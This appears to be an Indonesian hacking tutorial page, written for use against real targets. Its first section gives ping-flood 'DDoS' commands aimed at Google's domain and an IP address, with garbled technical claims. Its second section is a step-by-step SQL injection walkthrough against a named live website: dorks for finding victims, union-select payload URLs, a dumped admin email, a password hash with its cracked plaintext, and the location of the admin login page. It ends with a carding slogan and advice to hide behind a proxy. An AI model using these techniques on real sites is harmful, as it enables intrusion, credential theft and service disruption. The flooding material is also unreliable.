Cara Melakukan dDoS Attack

Cara Melakukan dDoS Attack


Aksi Denial of Service adalah salah satu cara menghentikan atau mematikan sebuah server pada computer atau server. Sebenarnya teknik ini adalah terknik yang suaaangaat kuno sekali yang banyak dilakukan pada zaman purbakala. Namun, pada zaman sekarang, banyak system yang telah di Upgrade. Maka, cara ini akan sangat susah sekali untuk dijalankan. Saran saya, sebaiknya anda mencoba pada computer atau website dalam sebuah jaringan dan diketahuispesifikasinya RENDAH-an.

Penambahan opsi l merupakan salah satu senjata Hacking yang digunakan dalam aktifitas Hacking. Dengan huruf l [-l (el)], maka ukuran default buffer yang akan dikirimkan adalah sebesar 32 bytes bisa diubah. Dalam aksi hacking, apabila seseorang menggunakan nilai buffer yang sangat buueesaarr sekali, tentu hal ini akan sangat berbahaya pada computer yang spesifikasinya rendah (seperti computer Pentium 2), terutama dalam sebuah jaringan. Efeknya akan langsung terlihat dan bekerja, yang berupa computer atau website target bisa menjadi Hang.

Penulisannya adalan dengan mengetikkan data ini dalam CMD (command prompt) atau  DOS: 

Ping -l ip-address/domain-target<besar-buffer>

Sebagai contoh untuk domain target:

Ping -l www.google.co.id 100000 

Contoh untuk domain IP address target: 

Ping -l 216.239.61.104 100000


Proses ini akan mengirimkan data sebesar 100000 paket data ke target. Dimana hal ini lebih  tinggi dibandingkan kapasitas TCP/IP Google yang hanya sebesar 90000 (ini hanya contoh  aja yaa..).


Perintah kedua yang digunakan dalam aksi DDoS ini adalah opsi -t. penulisannya adalah:

Ping -t ip-address/domain-target (cara penggunaanya sama seperti opsi -l)

Hal ini akan mengirimkan 32 bytes data ke target secara bertubi-tubi. Hal iinilah yang  menyebabkan komputer dengan spesifikasi rendah akan menjadi Hang atau Down.  Pemberhentian ini hanya bisa dilakukan dengan menekan tombol Ctrl+C pada keyboard.

Akan lebih parah lagi jika kedua opsi tersebut digabungkan menjadi satu:

Ping -t -l ip-address/domain-target<besar-buffer>



Basic Sql Injection

Basic Sql Injection



A. Pendahuluan 

SQL Injection di PHP tentu berbeda. Yang harus diketahui sebelum sql injection pada php adalah di depan sama dengan (=) ditambahkan tanda minus (id=-). Itu artinya sama dengan 1=2 agar id tersebut bernilai error. Dan dibelakang menggunakan tanda /* sama artinya dengan tanda --,# yang menandakan akhir perintah. Sekarang saya akan memberikan 1 contoh website. Tapi sebeblum melangkah lebih jauh, ada baiknya kita juga mempelajari cara mencari targetnya. Untuk itu kita terlebih dahulu harus mengerti dari special syntax yang ada pada Google. 

Contoh: inurl:“sharedded-categories.php?id=” inurl:“tradeCategory.php?id=”inurl:“product_ranges__view.php?id=” 

B. Mengetahui Website yang Vuln 

Bagaimana kita dapat mengetahui website tersebut mengandung vuln SQL Injection? Kita dapat menggunakan petik tunggal (‘) atau menggunakan operator (and 1=2) untuk mendapatkan error yang mengindikasikan respon dari mysql server. Saya memberikan contoh hasil pencarian melalui search engine google untuk dork: “product_list.php?id=” Contoh website: http://www.amvalewavs.co.uk kemudian kita harus mencari vulnerability pada website tersebut yang memuat dork “product_list.php?id=”. dan kita menemukannya pada link url:
http://www.amvalewavs.co.uk/product_list.php?id=1 cara mengecek bug pada web ini adalah: 
  1. Tambahkan tanda +and+1=0 (bernilai false) http://www.amvalewavs.co.uk/product_list.php?id=1+and+1=0 ---------- (artikel web akan menghilang).
  2. Tambahkan and 1=1 (bernilai true) http://www.amvalewavs.co.uk/product_list.php?id=1+and+1=1 ---------- (artikel web tampil kembali).
  3. Atau dapat juga dengan cara menambahkan tanda petik tunggal (‘) http://www.amvalewavs.co.uk/product_list.php?id=1’ ----------------- (you have an error in your SQL syntax….) Dari percobaan-percobaan diatas tersebut, sudah dapat dipastikan bahwa web tersebut mempunyai celah (vulner) untuk ditembus dengan sql. Kemudian kita akan mencari magic number pada web tersebut agar kita dapat memasukkan query sql-nya.

C. Memeriksa Kolom 

Dalam tahap ini kita memeriksa jumlah kolom sampai dimana kondisi tersebut adalah false. Cara melakukan pengecekan dimulai dari 1 s/d kondisi halaman mendapatkan kondisi false. Kita akan menggunakan syntax: order+by+1…dst -- (befungsi untuk mencari finished nimber). Akhirnya kondisi false diketahui pada kolom 13: http://www.amvalewavs.co.uk/product_list...11,12,13 – (unknown column ‘13’ in ‘order clause’, sorry, no product in this category) Maka dapat disimpulkan bahwa kolom yang tersedia pada website tersebut adalah 12 kolom. 

D. Mencari Lubang Kolom (Magic Number)

Dalam mencari magic number ini tidaklah sulit, jika kita sudah memeriksa dan menentukan jumlah kolom yang tersedia. Dalam tahap ini kita menggunakan syntax: ‘union+select’ dan sudah kita periksa bahwa jumlah kolom yang tersedia adalah 12. Nantinya segala informasi database akan dikeluarkan malalui magic number tersebut, yaitu 12. Kita dapat menggunakan tanda Minus pada akhir tanda sama dengan =- dan menambahkan tanda -- sebagai tanda akhir perintah dibelakang Url target. http://www.amvalewavs.co.uk/product_list...10,11,12--pada langkah diatas tampaklah bahwa angka 4 inilah yang disebut magic number. Dari langkah tersebut, terlihat hanya angka 4 yang dapat kita gunakan. 

E. Melihat Informasi Versi MySQL

Mengapa informasi versi MySql perlu kita ketahui? Karena setiap metode hack pada MySql versi 4 dan versi 5 sangat berbeda. Dalam tahap ini saya menggunakan version(). Letakkan version() pada magic number pada langkah sebelumnya. http://www.amvalewavs.co.uk/product_list...10,11,12-- maka terlihat bahwa versi MySql adalah versi 5.0.45. untuk MySql versi 5, maka kita dapat lanjutkan ke pemeriksaan table dan kolom. Tapi untuk versi 4, maka kita harus mencari dan menebak database, nama table dan kolom yang ditempatkan tidak beraturan. 

F. Memeriksa Tabel

Untuk memeriksa tabel, kita menggunakan 3 perintah dalam kasus ini. Syntax:
  • ‘union+select’; 
  • ‘group_concat(table_name)’;
  • ‘from+information_schema.tables+where+table_schema=database()--’ 
Artinya: kita akan mengeluarkan keseluruhan tabel menggunakan information schema dimana table yang di-schema adalah dari fungsi query database(). Dapat diartikan bahwa database() adalah perintah yang digunakan untuk melihat nama database. Langkah untuk melihat databse: http://www.amvalewavs.co.uk/product_list...a.tables--langkah untuk mencari tabel (limit): http://www.amvalewavs.co.uk/product_list...mit+18,1--langkah cepat untuk melihat tabel: http://www.amvalewavs.co.uk/product_list...tabase()--

G. Melihat Isi Kolom Dari Tabel

 Pada tahap ini kita dapat mengetahui kolom-kolom pada tabel yang bersangkutan. Untuk mengeluarkan column name, syntax-nya sama dengan mengeluarkan table name, hanya saja “table” kita ganti dengan “column”. Syntax: ‘union+select’; ‘group_concat(column_name)’; ‘from+information_schema.columns+where+table_name=nama_table_target--Artinya: kita akan mengeluarkan keseluruhan column menggunakan information schema dimna table name-nya = table yang jadi tujuan. Contoh: saya ingin mengeluarkan column yang ada pada table “admin” yang tampil pada website target. http://www.amvalewavs.co.uk/product_list...646D696E--keterangan: 0x61646D696E = adalah Hexa string dari Ascii textnya “admin”. Anda dapat melakukan convert text ke Ascii di http://ascii-convert.tk/ 

H. Melihat Data Dari Kolom Tersebut

Sekarang kita ingin melihat isi dari column name tersebut. Ini adalah langkah terakhir. Peranan perintah ‘group_concat’ sangatlah membantu dalam hal mempersingkat waktu. Contoh: saya akan data ‘admin_email_address’ dan ‘admin_password’ dari kolom admin. http://www.amvalewavs.co.uk/product_list...om+admin--dan sekarang kita dapat melihat hasilnya dari kolom admin tersebut: Email: develop@conceptwebsites.com password: 0e311e5b9704f28b4e8557e8fa3fbe7 Tinggal decrypt deh passwordnya sendiri (cari sendiri tool dan link-nya ya…). Dan ternyata setelah saya decrypt password diatas, hasilnya adalah “qwerty12”. 

I. Mencari Link URL Login Admin

Gunakan feeling, pengalaman dan daya ingat kita saja. Tapi kalau anda sudah menyerah, silahkan cari saja software IntelliTamper. Lalu install dan scan website target kita. Finishing: Carilah link direktori css, login, admin, admin1, dan sejenisnya (yang penting url untuk login admin). Dan ternyata hasil yang saya peroleh adalah: http://www.amvalewavs.co.uk/admin1/login.php tapi inget, jangan masuk-masuk rumah orang tanpa ijin lho. Kalau mau masuk ya slalu ijin dulu atau pake proxy/tunnel ya. “CARDING IS THE ART, SOUL AND RESPECT”